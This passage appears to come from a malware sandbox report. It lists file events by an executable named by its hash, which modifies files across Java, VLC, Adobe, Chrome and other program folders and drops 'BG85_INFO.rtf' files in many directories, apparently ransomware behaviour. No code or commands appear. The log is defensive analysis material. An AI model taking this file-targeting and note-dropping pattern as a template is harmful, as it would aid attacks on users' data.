Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Madeira c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\rmid.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bn.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\db\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Menominee c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Mail\wab.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-US.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-CN.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\preloaded_data.pb c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\GrantTest.MOD c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ko.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ta.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+1 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program 